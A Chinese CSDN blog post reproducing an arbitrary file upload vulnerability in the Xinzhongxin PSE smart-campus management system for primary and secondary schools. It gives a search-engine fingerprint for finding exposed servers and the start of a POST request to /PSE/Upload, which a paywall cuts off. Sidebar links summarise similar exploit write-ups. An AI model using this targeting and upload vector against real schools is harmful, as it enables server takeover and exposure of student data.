新中新中小学智慧校园信息管理系统PSE存在任意文件上传漏洞

最新推荐文章于 2024-09-26 19:29:41 发布
最新推荐文章于 2024-09-26 19:29:41 发布
阅读量126 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33331244/article/details/140659913
版权

一、漏洞简介

新中新华科电子有限公司是新中新集团旗下主营智慧校园、智慧餐饮、智慧政企领域的产业公司,集自有产品研发、生产制造、全国营销、系统集成、云化运营、运维服务为一体,为广大客户提供完整的解决方案和自主知识产权产品,是国内领先的校园一卡通系统解决方案供应商,在一卡通领域拥有多年的技术优势与经验积累,全国拥有众多双一流、985/211高校用户,还拥有大量K12用户及企业、事业单位客户。新中新中小学智慧校园信息管理系统PSE存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。

二、资产测绘

  • body=“/Login/IndexMobi”
  • 特征
    在这里插入图片描述

三、漏洞复现

POST /PSE/Upload HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept
了解本专栏 订阅专栏 解锁全文 超级会员免费看
xiaokp7
关注
专栏目录
订阅专栏
新中新中小学智慧校园信息管理系统SQL注入漏洞复现
The current road is different, love needs to distinguish between right and wrong
05-15 228
新中新中小学智慧校园信息管理系统是一套专为中小学校园打造的集学生校园安全,家校互动,校园金融以及校园一卡通为一体的基础教育信息化整体解决方案。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
智慧校园信息管理系统存在任意文件上传漏洞
千寻的博客
07-22 271
智慧校园信息管理系统PSE`存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
漏洞复现】某小学智慧校园信息管理系统——/PSE/Upload——文件上传
LongL_GuYu的博客
07-25 831
某小学智慧校园信息管理系统 `/PSE/Upload` 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
正方教务管理系统数据库任意操作漏洞:深度解析与安全防护
gitblog_06676的博客
09-26 782
正方教务管理系统数据库任意操作漏洞:深度解析与安全防护 【下载地址】正方教务管理系统数据库任意操作漏洞 本仓库提供了一个关于正方教务管理系统数据库任意操作漏洞的资源文件。该漏洞曾在乌云漏洞库(WooYun 漏洞库)中被记录,并由乌云镜像站保存。此资源文件详细描述了该漏洞的发现、影响以及可能的修复措施 ...
智慧校园管理系统 前台任意文件上传漏洞
孤桜懶契
03-31 3920
漏洞描述 智慧校园管理系统前台注册页面存在文件上传,由于没有对上传的文件进行审查导致可上传恶意文件控制服务器 漏洞影响 s ✅智慧校园管理系统 空间测绘 d ⭕body="DC_Login/QYSignUp" 漏洞复现 ✅企业注册界面存在漏洞 上传附件 上传一个冰蝎马 会有返回路径 连接地址 个人博客 孤桜懶契:https://gylq.gitee.io/time ...
【附poc】新中新中小学智慧校园信息管理系统存在SQL注入漏洞
jijisaq的博客
05-05 1007
新中新中小学智慧校园信息管理系统介绍:新中利用云服务技术同时借鉴互联网+模式,围绕基础教育信息化、智慧化建设,把线下业务和线上业务结合,为教育主管部门、校园管理者、教师、学生以及家长提供具有教务管理功能的平台化、移动化的应用系统——中小学智慧校园信息管理系统。由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!使用布尔盲注进行验证(文末获取poc)「你即将失去如下所有学习变强机会」sqlmap语法获取。
0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 719
U8 cloud 聚焦成长型、创型企业的云 ERP,基于全的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
[2016.9.27]neu校园网漏洞
Jinming Su
09-27 9494
第一次使用java进行网络编程,之前已经发现neu的校园网只要输入账号就可以随意断开网络. neu的校园网账号是形式比较规整,按照学号排列的,只要输入学号,之后密码随便填写,按照network中post的格式进行填写就可以了,试了一下,可以成功地断开校园网. 之后可尝试一下用java写爬虫,,, 希望网络中心能尽快修正.package com.sjming;import java.io.Buf
漏洞复现新中新中小学智慧校园信息管理系统上传接口存在各种文件上传漏洞
失心少年
07-28 130
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!新中新中小学智慧校园信息管理系统PSE存在各种文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
中小学智慧校园信息管理系统 /PSE/Upload 文件上传漏洞复现
0xSec
07-17 827
中小学智慧校园信息管理系统 /PSE/Upload 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现】校园信息管理系统-SQL注入-GetGradeList
知黑而守白
07-10 140
新中新中小学智慧校园信息管理系统是一款为中小学提供的智能化信息管理系统,由新中公司开发。该系统旨在整合学校各方面的信息管理需求,包括学生信息管理、教职工管理、课程安排、成绩管理等功能,为学校提供高效便捷的管理工具,提升教育教学水平和管理效率。新中新中小学智慧校园信息管理系统GetGradeList接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
漏洞复现】某学院教务一体化系统——任意账号密码重置
LongL_GuYu的博客
07-25 590
某学院教务一体化系统存在任意账号密码重置漏洞
关于正方教务系统(湖北工程学院)的one day越权漏洞的说明
Karka_的博客
06-05 1043
漏洞基于湖北工程学院教务管理系统进行演示,漏洞覆盖正方教务系统8.0以下版本,为本人一年前提交的漏洞,所以并非0day漏洞漏洞影响范围巨大,几乎涉及国内一半高校的教务系统,包含武汉大学、浙江工商大学等等而且据本人推测,此漏洞难以完全修复,因为我怀疑在该程序的设计阶段,权限验证模块与真实功能模块耦合度过高,所以到目前如此多的功能,已经难以完全修复所有页面了此漏洞仅供学习,请勿做任何违法的事情。本人在发布漏洞前已和本校教务系统及公司提前沟通,并已修复了较为重要的功能模块。
校园“一卡通”网站攻击测试用例
闲人的专栏
02-24 3206
全国各大高校普遍采用哈尔滨新中电子股份有限公司的“校园一卡通”运行日常校园内的各种应用,此系统提供了一个网站后台可以提供刷卡信息查询,丢卡挂失等操作。但该网站后台实现非常不严谨,存在很多的漏洞,根据乌云漏洞平台的数据2011年就有人提交这种网站的问题http://www.wooyun.org/bugs/wooyun-2011-03267,但是一直没有得到该厂家的重视和更。 下面提供一个攻击测
双一流高校某教学系统存在多个高危漏洞
蚁景网安学院
07-11 916
信息搜集过程中,除了用常见子域名扫一遍,还可以通过空间搜索引擎手动搜索。我用的就是把学校名称或者缩写作为关键字,利用一系列语法进行挨个查看。进行信息搜索(你得有一套自己的信息搜集逻辑吧,不然连这个系统都找不到)后,找到一处教学管理系统,点击页面上方软件,点击蓝色链接,进入教学系统。
【java毕业设计】应急救援物资管理系统源码(springboot+vue+mysql+说明文档).zip
最新发布
11-06
项目经过测试均可完美运行! 环境说明: 开发语言:java jdk:jdk1.8 数据库:mysql 5.7+ 数据库工具:Navicat11+ 管理工具:maven 开发工具:idea/eclipse
基于java的音乐网站答辩PPT.pptx
11-06
基于java的音乐网站答辩PPT.pptx
基于TPS2384的嵌入式ARM系统PSE设计:实现IEEE 802.3af PoE标准
嵌入式系统/ARM技术中的基于TPS2384的PSE设计与实现是一种针对网络设备提供电源的创解决方案。该技术主要围绕IEEE 802.3af标准展开,该标准规定了通过以太网线缆同时传输数据和48V直流电源的技术,促进了网络基础...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaokp7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值